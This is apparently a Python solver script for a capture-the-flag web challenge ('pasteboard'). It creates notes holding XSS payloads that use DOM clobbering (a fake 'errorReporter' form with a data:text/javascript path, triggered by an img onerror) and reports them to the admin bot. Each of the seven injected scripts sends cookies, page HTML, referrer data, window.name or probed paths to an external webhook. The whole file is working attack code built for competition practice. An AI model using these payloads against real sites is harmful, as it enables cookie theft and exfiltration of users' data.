#!/usr/bin/env python3
"""
Bot Behavior Analysis - Understanding what the bot actually does
"""
import requests
import time
import urllib.parse
from urllib.parse import urljoin


CHALLENGE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/b8fa597c-f59d-47ea-b708-1760317014ba"


def create_and_report(title, payload):
    """Create paste and report to bot"""
    print(f"\n[*] Testing: {title}")

    response = requests.post(
        urljoin(CHALLENGE_URL, "/note/new"),
        data={"title": title, "body": payload},
        allow_redirects=False
    )

    if response.status_code == 302:
        note_path = response.headers.get('Location')
        print(f"[+] Paste: {urljoin(CHALLENGE_URL, note_path)}")

        time.sleep(1)

        report_response = requests.post(
            urljoin(CHALLENGE_URL, "/report"),
            data={"url": note_path}
        )

        if report_response.status_code == 202:
            print(f"[+] Queued!")
            return True
    return False


print("="*80)
print("🤖 BOT BEHAVIOR ANALYSIS")
print("="*80)


# Test 1: Visit /report page and dump its content
code1 = f"""(async()=>{{
try{{
let resp=await fetch('/report',{{credentials:'include'}});
let text=await resp.text();
await fetch('{WEBHOOK}',{{
method:'POST',
body:JSON.stringify({{
method:'report_page',
cookies_after:document.cookie,
html_preview:text.substring(0,2000),
has_flag:text.includes('uoftctf')
}})
}});
}}catch(e){{
await fetch('{WEBHOOK}?method=report_page&error='+e.toString());
}}
}})();"""
payload1 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{urllib.parse.quote(code1.replace(chr(10), " "))}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
create_and_report("Test 1: Visit /report page", payload1)
time.sleep(12)


# Test 2: Visit /note/new and check for flag
code2 = f"""(async()=>{{
try{{
let resp=await fetch('/note/new',{{credentials:'include'}});
let text=await resp.text();
await fetch('{WEBHOOK}',{{
method:'POST',
body:JSON.stringify({{
method:'new_note_page',
cookies_after:document.cookie,
html_preview:text.substring(0,2000),
has_flag:text.includes('uoftctf')
}})
}});
}}catch(e){{
await fetch('{WEBHOOK}?method=new_note_page&error='+e.toString());
}}
}})();"""
payload2 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{urllib.parse.quote(code2.replace(chr(10), " "))}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
create_and_report("Test 2: Visit /note/new", payload2)
time.sleep(12)


# Test 3: Check referrer and see if it gives clues
code3 = f"""fetch('{WEBHOOK}',{{
method:'POST',
body:JSON.stringify({{
method:'referrer_check',
referrer:document.referrer,
location_href:location.href,
location_ancestorOrigins:location.ancestorOrigins?Array.from(location.ancestorOrigins):[],
opener:!!window.opener,
parent_is_self:window.parent===window,
top_is_self:window.top===window
}})
}});"""
payload3 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{urllib.parse.quote(code3.replace(chr(10), " "))}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
create_and_report("Test 3: Referrer analysis", payload3)
time.sleep(12)


# Test 4: Try to access /telemetry/error-reporter.js (the legitimate endpoint)
code4 = f"""(async()=>{{
try{{
let resp=await fetch('/telemetry/error-reporter.js',{{credentials:'include'}});
let text=await resp.text();
await fetch('{WEBHOOK}',{{
method:'POST',
body:JSON.stringify({{
method:'telemetry_script',
content:text,
has_flag:text.includes('uoftctf')
}})
}});
}}catch(e){{
await fetch('{WEBHOOK}?method=telemetry_script&error='+e.toString());
}}
}})();"""
payload4 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{urllib.parse.quote(code4.replace(chr(10), " "))}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
create_and_report("Test 4: Telemetry script", payload4)
time.sleep(12)


# Test 5: Check document.referrer right when page loads vs after delay
code5 = f"""var initialReferrer=document.referrer;
var initialCookie=document.cookie;
setTimeout(()=>{{
fetch('{WEBHOOK}',{{
method:'POST',
body:JSON.stringify({{
method:'timing_analysis',
initial_referrer:initialReferrer,
initial_cookie:initialCookie,
delayed_referrer:document.referrer,
delayed_cookie:document.cookie,
changed:initialCookie!==document.cookie
}})
}});
}},10000);"""
payload5 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{urllib.parse.quote(code5.replace(chr(10), " "))}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
create_and_report("Test 5: Timing analysis", payload5)
time.sleep(25)  # Longer wait for this one


# Test 6: Enumerate ALL fetch-able paths
code6 = f"""var paths=[
'/','/report','/note/new','/telemetry/report','/telemetry/error-reporter.js',
'/flag','/flag.txt','/admin','/api/flag','/static/flag'
];
Promise.all(paths.map(p=>
fetch(p).then(r=>{{return{{path:p,status:r.status,ok:r.ok}};}})
.catch(e=>{{return{{path:p,error:e.toString()}};}})
)).then(results=>{{
fetch('{WEBHOOK}',{{
method:'POST',
body:JSON.stringify({{method:'path_enumeration',results:results}})
}});
}});"""
payload6 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{urllib.parse.quote(code6.replace(chr(10), " "))}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
create_and_report("Test 6: Path enumeration", payload6)
time.sleep(12)


# Test 7: Check if window.name has anything
code7 = f"""fetch('{WEBHOOK}',{{
method:'POST',
body:JSON.stringify({{
method:'window_name',
name:window.name,
length:window.name.length,
has_flag:window.name.includes('uoftctf')
}})
}});"""
payload7 = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{urllib.parse.quote(code7.replace(chr(10), " "))}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'
create_and_report("Test 7: window.name check", payload7)


print("\n" + "="*80)
print("✅ BOT BEHAVIOR TESTS QUEUED")
print("="*80)
print(f"📊 Check webhook: {WEBHOOK}")
print("="*80)
print("\nThese tests will:")
print("  1. Visit and dump /report page content")
print("  2. Visit and dump /note/new page content")
print("  3. Analyze referrer and window context")
print("  4. Fetch /telemetry/error-reporter.js")
print("  5. Compare initial vs delayed cookies (10s)")
print("  6. Enumerate all possible HTTP paths")
print("  7. Check window.name for hidden data")
print("="*80)